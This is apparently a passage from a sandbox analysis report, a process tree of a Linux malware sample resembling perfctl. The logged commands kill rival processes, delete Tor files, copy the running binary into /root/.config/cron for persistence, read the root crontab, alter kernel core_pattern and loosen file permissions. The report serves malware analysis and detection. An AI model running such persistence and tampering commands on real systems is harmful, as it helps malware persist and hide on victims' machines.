                                                                                                                                                                                                                                                                            systemctl daemon-reload
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:3405
                                                                                                                                                                                                                                                                            • /tmp/systemctl
                                                                                                                                                                                                                                                                              systemctl daemon-reload
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:3405
                                                                                                                                                                                                                                                                              • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:3405
                                                                                                                                                                                                                                                                                • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                                  systemctl daemon-reload
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:3405
                                                                                                                                                                                                                                                                                  • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                                    systemctl daemon-reload
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:3405
                                                                                                                                                                                                                                                                                    • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                      systemctl daemon-reload
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:3405
                                                                                                                                                                                                                                                                                • /usr/bin/who
                                                                                                                                                                                                                                                                                  who
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:3249
                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                    /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                    PID:3546
                                                                                                                                                                                                                                                                                    • /usr/bin/who
                                                                                                                                                                                                                                                                                      who
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:3547
                                                                                                                                                                                                                                                                                      • /usr/bin/wc
                                                                                                                                                                                                                                                                                        wc -l
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:3548
                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                        /bin/sh -c "killall -9 perfctl;pkill -9 perfctl"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                        PID:3549
                                                                                                                                                                                                                                                                                        • /usr/bin/killall
                                                                                                                                                                                                                                                                                          killall -9 perfctl
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                          PID:3550
                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                          pkill -9 perfctl
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                          PID:3553
                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                        /bin/sh -c "ps -ax|grep perfctl|grep -v grep|awk '{print \$1}'|xargs kill -9"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:3627
                                                                                                                                                                                                                                                                                          • /usr/bin/ps
                                                                                                                                                                                                                                                                                            ps -ax
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Reads CPU attributes
                                                                                                                                                                                                                                                                                            • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                            • Reads runtime system information
                                                                                                                                                                                                                                                                                            PID:3631
                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                            grep perfctl
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:3636
                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                              grep -v grep
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:3637
                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                awk "{print \$1}"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:3640
                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                  xargs kill -9
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:3643
                                                                                                                                                                                                                                                                                                    • /tmp/.perf.c/kill
                                                                                                                                                                                                                                                                                                      kill -9
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:3687
                                                                                                                                                                                                                                                                                                      • /tmp/kill
                                                                                                                                                                                                                                                                                                        kill -9
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:3687
                                                                                                                                                                                                                                                                                                        • /usr/local/sbin/kill
                                                                                                                                                                                                                                                                                                          kill -9
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:3687
                                                                                                                                                                                                                                                                                                          • /usr/local/bin/kill
                                                                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:3687
                                                                                                                                                                                                                                                                                                            • /usr/sbin/kill
                                                                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:3687
                                                                                                                                                                                                                                                                                                              • /usr/bin/kill
                                                                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:3687
                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                              /bin/sh -c "killall -9 obfs4proxy;pkill -9 obfs4proxy"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                              PID:3688
                                                                                                                                                                                                                                                                                                              • /usr/bin/killall
                                                                                                                                                                                                                                                                                                                killall -9 obfs4proxy
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                                PID:3689
                                                                                                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                pkill -9 obfs4proxy
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                                PID:3690
                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                              /bin/sh -c "ps -ax|grep obfs4proxy|grep -v grep|awk '{print \$1}'|xargs kill -9"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:3693
                                                                                                                                                                                                                                                                                                                • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                  ps -ax
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                  PID:3694
                                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                  grep obfs4proxy
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:3695
                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                    grep -v grep
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:3696
                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                      awk "{print \$1}"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:3697
                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                        xargs kill -9
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:3698
                                                                                                                                                                                                                                                                                                                          • /tmp/.perf.c/kill
                                                                                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:3703
                                                                                                                                                                                                                                                                                                                            • /tmp/kill
                                                                                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:3703
                                                                                                                                                                                                                                                                                                                              • /usr/local/sbin/kill
                                                                                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:3703
                                                                                                                                                                                                                                                                                                                                • /usr/local/bin/kill
                                                                                                                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:3703
                                                                                                                                                                                                                                                                                                                                  • /usr/sbin/kill
                                                                                                                                                                                                                                                                                                                                    kill -9
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:3703
                                                                                                                                                                                                                                                                                                                                    • /usr/bin/kill
                                                                                                                                                                                                                                                                                                                                      kill -9
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:3703
                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                    sh -c "rm -f /tmp/.xdiag/tordata/torrc-* 2>/dev/null"
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:3704
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/rm
                                                                                                                                                                                                                                                                                                                                        rm -f "/tmp/.xdiag/tordata/torrc-*"
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:3705
                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                        /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                        PID:3706
                                                                                                                                                                                                                                                                                                                                        • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                          who
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:3707
                                                                                                                                                                                                                                                                                                                                          • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                            wc -l
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:3708
                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                            /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                            PID:3710
                                                                                                                                                                                                                                                                                                                                            • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                              who
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:3711
                                                                                                                                                                                                                                                                                                                                              • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                wc -l
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3712
                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                PID:3713
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                  who
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3714
                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                    wc -l
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:3715
                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                    /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                    PID:3716
                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                      who
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3717
                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                        wc -l
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:3718
                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                        /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                        PID:3719
                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                          who
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3720
                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                            wc -l
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3721
                                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                                            /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                            PID:3722
                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                              who
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:3723
                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                wc -l
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:3724
                                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                PID:3725
                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                  who
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:3726
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                    wc -l
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:3727
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                    chmod -R 777 /tmp/.xdiag/data
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                    • Modifies special file permissions
                                                                                                                                                                                                                                                                                                                                                                    PID:3728
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                                                    getent passwd 0
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • Disables SELinux
                                                                                                                                                                                                                                                                                                                                                                    PID:3729
                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                    /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                    PID:3730
                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                      who
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3731
                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                        wc -l
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:3732
                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                        /bin/sh -c "cp /proc/2500/exe /root/.config/cron/perfcc && chmod +x /root/.config/cron/perfcc"
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                        • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                        PID:3733
                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/cp
                                                                                                                                                                                                                                                                                                                                                                          cp /proc/2500/exe /root/.config/cron/perfcc
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:3734
                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                            chmod +x /root/.config/cron/perfcc
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                            • Modifies special file permissions
                                                                                                                                                                                                                                                                                                                                                                            PID:3735
                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                          /bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null|grep cron|grep '/root\$'|xargs cat"
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                          PID:3736
                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/find
                                                                                                                                                                                                                                                                                                                                                                            find /var/spool/cron/crontabs -type f
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3737
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                              grep cron
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:3738
                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                grep "/root\$"
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3739
                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                  xargs cat
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:3740
                                                                                                                                                                                                                                                                                                                                                                                    • /tmp/.perf.c/cat
                                                                                                                                                                                                                                                                                                                                                                                      cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3741
                                                                                                                                                                                                                                                                                                                                                                                      • /tmp/cat
                                                                                                                                                                                                                                                                                                                                                                                        cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:3741
                                                                                                                                                                                                                                                                                                                                                                                        • /usr/local/sbin/cat
                                                                                                                                                                                                                                                                                                                                                                                          cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:3741
                                                                                                                                                                                                                                                                                                                                                                                          • /usr/local/bin/cat
                                                                                                                                                                                                                                                                                                                                                                                            cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:3741
                                                                                                                                                                                                                                                                                                                                                                                            • /usr/sbin/cat
                                                                                                                                                                                                                                                                                                                                                                                              cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3741
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3741
                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                              PID:3742
                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                              PID:3743
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                who
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3744
                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                  wc -l
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3745
                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                  /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3746
                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                    who
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3747
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                      wc -l
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:3748
                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                      /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3749
                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                        who
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3750
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                          wc -l
                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:3751
                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                          /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3752
                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                            who
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:3753
                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                              wc -l
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:3754
                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                              PID:3755
                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                who
                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3756
                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                  wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3757
                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                  /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3758
                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                    who
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3759
                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                      wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3760
                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                      chmod -R 755 /tmp/.xdiag
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies special file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3761
                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                      chmod -R 777 /tmp/.xdiag/data
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies special file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3762
                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                      /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3763
                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                        who
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3764
                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                          wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3765
                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                          /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3766
                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                            who
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3767
                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                              wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3768
                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3769
